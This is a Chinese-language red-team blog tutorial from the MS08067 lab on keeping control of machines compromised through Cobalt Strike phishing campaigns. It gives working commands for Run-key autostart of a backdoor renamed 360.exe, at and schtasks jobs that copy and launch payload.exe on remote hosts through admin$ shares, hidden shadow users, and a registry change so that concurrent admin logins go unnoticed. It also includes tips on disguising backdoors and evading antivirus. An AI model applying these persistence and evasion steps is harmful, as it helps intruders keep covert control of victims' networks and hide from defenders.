CobalStrike批量上线后的权限维持和信息收集~

出品｜MS08067实验室

本文作者：BlackCat（Ms08067内网安全小组成员）

前言：

昨天做CS批量上线的时候发现，内网渗透的本质都是信息收集，也就是收集各种账号密码，一旦有了密码，这个系统也就不攻而破了。然后就在网上以及查阅资料中，整理了以下的搜集姿势。

权限维持：

比如通过钓鱼邮件，批量获取了一批上线机器，但是我们不能第上来就进行其他主机的渗透，第一步应 该进行维稳加固。

维稳方法一：加入出册表自启动

之所以放入注册表中，是由于我们后期的操作可能需要一个正常用户权限的shell,因为有些操作必须在对应的用户权限下才能正常进行，比如wmi,schtasks,net user,截屏，键盘记录等等。。

在网上翻阅了一大堆的关于这个方法的资料

参考链接：

网上大佬的脚本方法我没能实验成功，就算成功了，上传会不会被杀也不一定，所以我选择了最保守的 方法利用beacon执行cmd的命令来修改注册表：

这里用到了reg命令：eg命令是Windows提供的，它可以添加、更改和显示注册表项中的注册表子项信息和值。

首先我们要知道，注册表里开机自启动的目录是什么：

Win+R执行regedit后依次打开以下目录

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

这样就能看到开机自启动的内容都有什么:

这个在cmd中的命令为

REG query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run#显示这个目录下的所有的值

在beacon中执行就是前面加个shell

可以看到成功执行：然后下一步就是添加我们的后门程序到这个目录下，个人经验，感觉这里尽量稍稍 伪装一下自己的后门程序名，有的管理员安全意识高的可能会查看，这里我把它改为360.exe

然后通过文件浏览器，把这个后门上传上去，但是一定要做好免杀，这里我上传到了 "C:\Windows\Temp"目录下：

语法为：

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run" /v【启bai动名】/d "【启动路径】"/f替换

上面这个会对所有用户生效，如果只想对当前用户生效，把HKEY_LOCAL_MACHINE改为 HKEY_CURRENT_USER 就可以了。

REG add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 360 /d "C:\Windows\Temp\360.exe" /f

然后在beacon中执行：

然后去被控机上面看是否生效:

成功了 。。还有⼀条删除命令：

REG delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 360 /f #删除360这个进程

最后我先在cs上下了这台机器，然后重启了下这台机器，重启后发现cs直接上线，所以这步我们就此告—段落。

REG query"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"#显示这个目录下的所有的值REG add"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"/v360/d"C:\Windows\Temp\360.exe" /f #把上传的后门程序设置成开机自启动REG delete"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"/v 360/f #删除自启动

维稳方法二：加入高权限组执行计划任务

一般情况下我们获取的CS后门权限都是administrator的，

但是我们后期要弹system的shell时候，或者和域内DC机通讯的话，还是需要system权限的。最简单的提权

执行完后会新上线一台机器权限为system，提权成功。

但是慢慢发现，有的时候，system权限并虽然高，但是感觉还是不适合我们操作，有些命令还是administrator权限执行可以，比如wmi,schtasks,netuse r,截屏，键盘记录等

这里就在继续说一下

维稳方法三：Windows的计划任务（schtasks）

简介：

计划任务，顾名思义，指定时间做指定的事情，对windows来说可能是执行脚本，也可能是exe。计划任务的利用不仅仅在横向渗透中，也可以是在权限维持。

利用前提:

1.必须通过其他手段拿到本地或者域管理账号密码

2.若在横向渗透过程中，要保证当前机器能netuse远程到目标机器上

3.目标机器开启了taskscheduler服务

测试：

对于XP或者2003以下的机器，基本都是用at来管理本地或者远程机器上的计划任务。这里没有搭建03的机器，就简单的列一下命令，解释一下。

ne tuse \\192.168.1.101\admin$ /user:"administrator" admin #netuse 连接

net time \\192.168.1.101 #查看远程主机时间

xcopyc:\payload.exe \\192.168.1.101\admin$\temp

# 拷贝payload至0远程主机对应目录下

at\\192.168.1.10119:30 /every:5,10,15,20,25,30c:\windows\temp\payload.exe

#设定计划任务，每月5,10,15,20,25,30日的19:30执行命令运行payload

设置完计划任务后可以通过以下命令查看：

at \\192.168.1.101

删除任务的话只需要加上参数/delete即可。这样会在指定日期的晚上七点半返回一个会话。

在win7后的版本就有了个新的功能，schtasks计划任务：

比如我要在十点后启用这个这个后门。

schtasks/create /tn "360"/trC:\Windows\Temp\360.exe /sc DAILY /st 10:00

/tn任务名（自定义）/tr目录，也可以是执行的命令 schtasks/query /tn 360/v schtasks /query|findstr "360" #查询创建的任务 schtasks/run /tn 360 #立即运行创建的任务 schtasks/delete /tn 360 #删除任务

参考:

说了这么多，感觉比较麻烦，那我们直接运行不就好了么，其实不然，有些安全软件，会识别你的行为，阻止你去执行某些操作，但是计算机执行的操作则不会被拦截，所以也常用于内网中的bypass。

维稳方法四：创建隐藏用户

简介：

隐藏用户也叫影子用户，创建一个无法用用户本机用户罗列工具显示的用户，并且赋予管理员权限。所有操作需要有管理员权限。同时测试在windowsserver 2012服务器域环境下影子账户无法直接进行添加。

详细操作步骤参考网上资料；

维稳方法五：多地登陆管理员账号不被发现

这个是我一个朋友告诉我的方法，他在护网时候权限丢失就是远程登陆administrato r账号的时候，被管理员发现，然后关机了，导致权限丢失，那么如何解决这个问题。这个执行起来也很简单

还是修改注册表：

首先线以此打开注册表中的文件

\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\fSingleSessionPerUser

双击打开这个文件，看里面的数值数据为0还是1

为1是不允许多地远程，

为0,是允许03以上的系统基本上默认都是为1不允许所以这里就需要我们更改这个

之后再多个终端远程这台主机就不会有提示了。

总结：

我这里只是简单介绍了一些CS的简单使用，没有涉及到各种杀软的绕过，CS的提权插件以及内网主机搜集插件等，还有就是CS后门免杀技术。我也在正在学习后门免杀技术，后续如果可能在做分享。

维稳方法还有很多，这里就先介绍这些吧，CS上线只是内网渗透的一个开始，本人也是初学者，文中如果哪里存在纰漏，敬请大佬们批评指正。